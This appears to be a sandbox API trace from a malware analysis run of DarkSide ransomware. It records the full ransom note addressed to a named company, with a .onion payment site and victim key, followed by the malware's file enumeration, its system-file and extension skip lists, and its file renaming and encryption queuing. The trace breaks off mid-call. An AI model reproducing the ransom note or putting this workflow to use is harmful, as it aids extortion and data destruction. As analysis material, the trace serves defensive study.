[0167.790] _wcsicmp (_Str1="all users", _Str2="XGqrhHf_R") returned -23 [0167.790] wcslen (_String="all users") returned 0x9 [0167.790] _wcsicmp (_Str1="default", _Str2="XGqrhHf_R") returned -20 [0167.790] wcslen (_String="default") returned 0x7 [0167.790] wcscpy (in: _Dest=0x210e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*" [0167.790] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned 0x2c [0167.790] wcscpy (in: _Dest=0x210e76, _Source="XGqrhHf_R" | out: _Dest="XGqrhHf_R") returned="XGqrhHf_R" [0167.790] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3480048 [0167.791] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0167.792] wcscpy (in: _Dest=0x3480048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" [0167.792] GetNamedSecurityInfoW () returned 0x0 [0167.792] SetEntriesInAclW () returned 0x0 [0167.792] SetNamedSecurityInfoW () returned 0x0 [0167.795] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c2e8) returned 1 [0167.795] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.795] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r")) returned 1 [0167.795] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.795] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.797] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0167.798] CloseHandle (hObject=0x1bc) returned 1 [0167.798] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.798] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r")) returned 0x10 [0167.798] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\") returned="" [0167.798] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\") returned 0x35 [0167.799] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0167.799] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa36095e0, ftCreationTime.dwHighDateTime=0x1d5dd17, ftLastAccessTime.dwLowDateTime=0x91b66860, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91b66860, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.799] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61d01530, ftCreationTime.dwHighDateTime=0x1d5dec8, ftLastAccessTime.dwLowDateTime=0x7bf45b40, ftLastAccessTime.dwHighDateTime=0x1d5e60e, ftLastWriteTime.dwLowDateTime=0x7bf45b40, ftLastWriteTime.dwHighDateTime=0x1d5e60e, nFileSizeHigh=0x0, nFileSizeLow=0x15f86, dwReserved0=0x0, dwReserved1=0x0, cFileName="8eSxV.gif", cAlternateFileName="")) returned 1 [0167.799] _wcsicmp (_Str1="8eSxV.gif", _Str2="README.c06622a1.TXT") returned -58 [0167.799] wcsstr (_Str="8eSxV.gif", _SubStr="README") returned 0x0 [0167.799] _wcsicmp (_Str1="autorun.inf", _Str2="8eSxV.gif") returned 41 [0167.799] wcslen (_String="autorun.inf") returned 0xb [0167.799] _wcsicmp (_Str1="boot.ini", _Str2="8eSxV.gif") returned 42 [0167.799] wcslen (_String="boot.ini") returned 0x8 [0167.800] _wcsicmp (_Str1="bootfont.bin", _Str2="8eSxV.gif") returned 42 [0167.800] wcslen (_String="bootfont.bin") returned 0xc [0167.800] _wcsicmp (_Str1="bootsect.bak", _Str2="8eSxV.gif") returned 42 [0167.800] wcslen (_String="bootsect.bak") returned 0xc [0167.800] _wcsicmp (_Str1="desktop.ini", _Str2="8eSxV.gif") returned 44 [0167.800] wcslen (_String="desktop.ini") returned 0xb [0167.800] _wcsicmp (_Str1="iconcache.db", _Str2="8eSxV.gif") returned 49 [0167.800] wcslen (_String="iconcache.db") returned 0xc [0167.800] _wcsicmp (_Str1="ntldr", _Str2="8eSxV.gif") returned 54 [0167.800] wcslen (_String="ntldr") returned 0x5 [0167.800] _wcsicmp (_Str1="ntuser.dat", _Str2="8eSxV.gif") returned 54 [0167.800] wcslen (_String="ntuser.dat") returned 0xa [0167.800] _wcsicmp (_Str1="ntuser.dat.log", _Str2="8eSxV.gif") returned 54 [0167.800] wcslen (_String="ntuser.dat.log") returned 0xe [0167.800] _wcsicmp (_Str1="ntuser.ini", _Str2="8eSxV.gif") returned 54 [0167.800] wcslen (_String="ntuser.ini") returned 0xa [0167.800] _wcsicmp (_Str1="thumbs.db", _Str2="8eSxV.gif") returned 60 [0167.800] wcslen (_String="thumbs.db") returned 0x9 [0167.800] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0167.800] wcslen (_String="386") returned 0x3 [0167.800] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0167.800] wcslen (_String="adv") returned 0x3 [0167.800] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0167.800] wcslen (_String="ani") returned 0x3 [0167.800] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0167.800] wcslen (_String="bat") returned 0x3 [0167.800] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0167.801] wcslen (_String="bin") returned 0x3 [0167.801] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0167.801] wcslen (_String="cab") returned 0x3 [0167.801] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0167.801] wcslen (_String="cmd") returned 0x3 [0167.801] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0167.801] wcslen (_String="com") returned 0x3 [0167.801] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0167.801] wcslen (_String="cpl") returned 0x3 [0167.801] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0167.801] wcslen (_String="cur") returned 0x3 [0167.801] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0167.801] wcslen (_String="deskthemepack") returned 0xd [0167.801] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0167.801] wcslen (_String="diagcab") returned 0x7 [0167.801] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0167.801] wcslen (_String="diagcfg") returned 0x7 [0167.801] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0167.801] wcslen (_String="diagpkg") returned 0x7 [0167.801] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0167.801] wcslen (_String="dll") returned 0x3 [0167.801] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0167.801] wcslen (_String="drv") returned 0x3 [0167.801] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0167.801] wcslen (_String="exe") returned 0x3 [0167.801] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0167.801] wcslen (_String="hlp") returned 0x3 [0167.801] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0167.801] wcslen (_String="icl") returned 0x3 [0167.801] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0167.802] wcslen (_String="icns") returned 0x4 [0167.802] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0167.802] wcslen (_String="ico") returned 0x3 [0167.802] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0167.802] wcslen (_String="ics") returned 0x3 [0167.802] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0167.802] wcslen (_String="idx") returned 0x3 [0167.802] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0167.802] wcslen (_String="ldf") returned 0x3 [0167.802] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0167.802] wcslen (_String="lnk") returned 0x3 [0167.802] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0167.802] wcslen (_String="mod") returned 0x3 [0167.802] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0167.802] wcslen (_String="mpa") returned 0x3 [0167.802] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0167.802] wcslen (_String="msc") returned 0x3 [0167.802] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0167.802] wcslen (_String="msp") returned 0x3 [0167.802] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0167.802] wcslen (_String="msstyles") returned 0x8 [0167.802] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0167.802] wcslen (_String="msu") returned 0x3 [0167.802] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0167.802] wcslen (_String="nls") returned 0x3 [0167.802] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0167.802] wcslen (_String="nomedia") returned 0x7 [0167.802] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0167.803] wcslen (_String="ocx") returned 0x3 [0167.803] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0167.803] wcslen (_String="prf") returned 0x3 [0167.803] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0167.803] wcslen (_String="ps1") returned 0x3 [0167.803] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0167.803] wcslen (_String="rom") returned 0x3 [0167.803] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0167.803] wcslen (_String="rtp") returned 0x3 [0167.803] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0167.803] wcslen (_String="scr") returned 0x3 [0167.803] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0167.803] wcslen (_String="shs") returned 0x3 [0167.803] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0167.803] wcslen (_String="spl") returned 0x3 [0167.803] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0167.803] wcslen (_String="sys") returned 0x3 [0167.803] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0167.803] wcslen (_String="theme") returned 0x5 [0167.803] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0167.803] wcslen (_String="themepack") returned 0x9 [0167.803] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0167.803] wcslen (_String="wpx") returned 0x3 [0167.803] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0167.803] wcslen (_String="lock") returned 0x4 [0167.803] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0167.803] wcslen (_String="key") returned 0x3 [0167.803] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0167.803] wcslen (_String="hta") returned 0x3 [0167.803] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0167.804] wcslen (_String="msi") returned 0x3 [0167.804] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0167.804] wcslen (_String="pdb") returned 0x3 [0167.804] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0167.804] wcslen (_String="sqlite") returned 0x6 [0167.804] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r")) returned 0x10 [0167.804] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0167.804] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" [0167.804] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R") returned 0x34 [0167.804] wcscpy (in: _Dest=0x32400ca, _Source="8eSxV.gif" | out: _Dest="8eSxV.gif") returned="8eSxV.gif" [0167.804] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\8eSxV.gif", dwFileAttributes=0x80) returned 1 [0167.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\8eSxV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\8esxv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0167.805] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.805] ReadFile (in: hFile=0x198, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0167.805] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x1c37d9e [0167.805] RtlComputeCrc32 (PartialCrc=0x7d9e, Buffer=0x32e9a4, Length=0x80) returned 0x34f65707 [0167.805] RtlComputeCrc32 (PartialCrc=0x5707, Buffer=0x32e9a4, Length=0x80) returned 0x1edaecf3 [0167.806] RtlComputeCrc32 (PartialCrc=0xecf3, Buffer=0x32e9a4, Length=0x80) returned 0xd9c78507 [0167.806] RtlComputeCrc32 (PartialCrc=0x8507, Buffer=0x32e9a4, Length=0x80) returned 0x85f44c85 [0167.806] CloseHandle (hObject=0x198) returned 1 [0167.806] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0167.806] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\8eSxV.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\8eSxV.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\8eSxV.gif" [0167.806] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\8eSxV.gif") returned 0x3e [0167.806] wcscpy (in: _Dest=0x32500e4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.806] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\8eSxV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\8esxv.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\8eSxV.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\8esxv.gif.c06622a1"), dwFlags=0x8) returned 1 [0167.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\8eSxV.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\8esxv.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x198 [0167.809] CreateIoCompletionPort (FileHandle=0x198, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.809] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x39e0020 [0167.818] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x33aa19ce [0167.818] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6348ad36 [0167.818] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x630859ed [0167.818] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x39418150 [0167.818] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77262cb1 [0167.818] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3084b561 [0167.818] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb4d79f0 [0167.818] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3311ab11 [0167.821] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x39e0094, Length=0x80) returned 0x21b3fbf6 [0167.821] RtlComputeCrc32 (PartialCrc=0xfbf6, Buffer=0x39e0094, Length=0x80) returned 0xc207a847 [0167.821] RtlComputeCrc32 (PartialCrc=0xa847, Buffer=0x39e0094, Length=0x80) returned 0x8f7c9987 [0167.821] RtlComputeCrc32 (PartialCrc=0x9987, Buffer=0x39e0094, Length=0x80) returned 0x1678ea3 [0167.821] RtlComputeCrc32 (PartialCrc=0x8ea3, Buffer=0x39e0094, Length=0x80) returned 0xe90a85d2 [0167.821] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x39e0020) returned 1 [0167.822] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0167.822] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0167.822] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf148afe0, ftCreationTime.dwHighDateTime=0x1d5e19f, ftLastAccessTime.dwLowDateTime=0x794c7770, ftLastAccessTime.dwHighDateTime=0x1d5e487, ftLastWriteTime.dwLowDateTime=0x794c7770, ftLastWriteTime.dwHighDateTime=0x1d5e487, nFileSizeHigh=0x0, nFileSizeLow=0x8747, dwReserved0=0x0, dwReserved1=0x0, cFileName="Miwvk.jpg", cAlternateFileName="")) returned 1 [0167.822] _wcsicmp (_Str1="Miwvk.jpg", _Str2="README.c06622a1.TXT") returned -5 [0167.822] wcsstr (_Str="Miwvk.jpg", _SubStr="README") returned 0x0 [0167.822] _wcsicmp (_Str1="autorun.inf", _Str2="Miwvk.jpg") returned -12 [0167.822] wcslen (_String="autorun.inf") returned 0xb [0167.822] _wcsicmp (_Str1="boot.ini", _Str2="Miwvk.jpg") returned -11 [0167.822] wcslen (_String="boot.ini") returned 0x8 [0167.822] _wcsicmp (_Str1="bootfont.bin", _Str2="Miwvk.jpg") returned -11 [0167.822] wcslen (_String="bootfont.bin") returned 0xc [0167.822] _wcsicmp (_Str1="bootsect.bak", _Str2="Miwvk.jpg") returned -11 [0167.822] wcslen (_String="bootsect.bak") returned 0xc [0167.822] _wcsicmp (_Str1="desktop.ini", _Str2="Miwvk.jpg") returned -9 [0167.822] wcslen (_String="desktop.ini") returned 0xb [0167.822] _wcsicmp (_Str1="iconcache.db", _Str2="Miwvk.jpg") returned -4 [0167.822] wcslen (_String="iconcache.db") returned 0xc [0167.822] _wcsicmp (_Str1="ntldr", _Str2="Miwvk.jpg") returned 1 [0167.822] wcslen (_String="ntldr") returned 0x5 [0167.822] _wcsicmp (_Str1="ntuser.dat", _Str2="Miwvk.jpg") returned 1 [0167.822] wcslen (_String="ntuser.dat") returned 0xa [0167.822] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Miwvk.jpg") returned 1 [0167.822] wcslen (_String="ntuser.dat.log") returned 0xe [0167.822] _wcsicmp (_Str1="ntuser.ini", _Str2="Miwvk.jpg") returned 1 [0167.822] wcslen (_String="ntuser.ini") returned 0xa [0167.823] _wcsicmp (_Str1="thumbs.db", _Str2="Miwvk.jpg") returned 7 [0167.823] wcslen (_String="thumbs.db") returned 0x9 [0167.823] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.823] wcslen (_String="386") returned 0x3 [0167.823] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.823] wcslen (_String="adv") returned 0x3 [0167.823] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.823] wcslen (_String="ani") returned 0x3 [0167.823] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.823] wcslen (_String="bat") returned 0x3 [0167.823] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.823] wcslen (_String="bin") returned 0x3 [0167.823] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.823] wcslen (_String="cab") returned 0x3 [0167.823] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.823] wcslen (_String="cmd") returned 0x3 [0167.823] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.823] wcslen (_String="com") returned 0x3 [0167.823] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.823] wcslen (_String="cpl") returned 0x3 [0167.823] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.823] wcslen (_String="cur") returned 0x3 [0167.823] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.823] wcslen (_String="deskthemepack") returned 0xd [0167.823] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.823] wcslen (_String="diagcab") returned 0x7 [0167.823] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.824] wcslen (_String="diagcfg") returned 0x7 [0167.824] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.824] wcslen (_String="diagpkg") returned 0x7 [0167.824] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.824] wcslen (_String="dll") returned 0x3 [0167.824] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.824] wcslen (_String="drv") returned 0x3 [0167.824] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.824] wcslen (_String="exe") returned 0x3 [0167.824] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.824] wcslen (_String="hlp") returned 0x3 [0167.824] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.824] wcslen (_String="icl") returned 0x3 [0167.824] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.824] wcslen (_String="icns") returned 0x4 [0167.824] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.824] wcslen (_String="ico") returned 0x3 [0167.824] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.824] wcslen (_String="ics") returned 0x3 [0167.824] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.824] wcslen (_String="idx") returned 0x3 [0167.824] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.824] wcslen (_String="ldf") returned 0x3 [0167.824] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.824] wcslen (_String="lnk") returned 0x3 [0167.824] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.824] wcslen (_String="mod") returned 0x3 [0167.824] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.825] wcslen (_String="mpa") returned 0x3 [0167.825] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.825] wcslen (_String="msc") returned 0x3 [0167.825] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.825] wcslen (_String="msp") returned 0x3 [0167.825] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.825] wcslen (_String="msstyles") returned 0x8 [0167.825] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.825] wcslen (_String="msu") returned 0x3 [0167.825] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.825] wcslen (_String="nls") returned 0x3 [0167.825] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.825] wcslen (_String="nomedia") returned 0x7 [0167.825] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.825] wcslen (_String="ocx") returned 0x3 [0167.825] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.825] wcslen (_String="prf") returned 0x3 [0167.825] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.825] wcslen (_String="ps1") returned 0x3 [0167.825] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.825] wcslen (_String="rom") returned 0x3 [0167.825] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.825] wcslen (_String="rtp") returned 0x3 [0167.825] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.825] wcslen (_String="scr") returned 0x3 [0167.825] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.825] wcslen (_String="shs") returned 0x3 [0167.825] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.825] wcslen (_String="spl") returned 0x3 [0167.825] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.826] 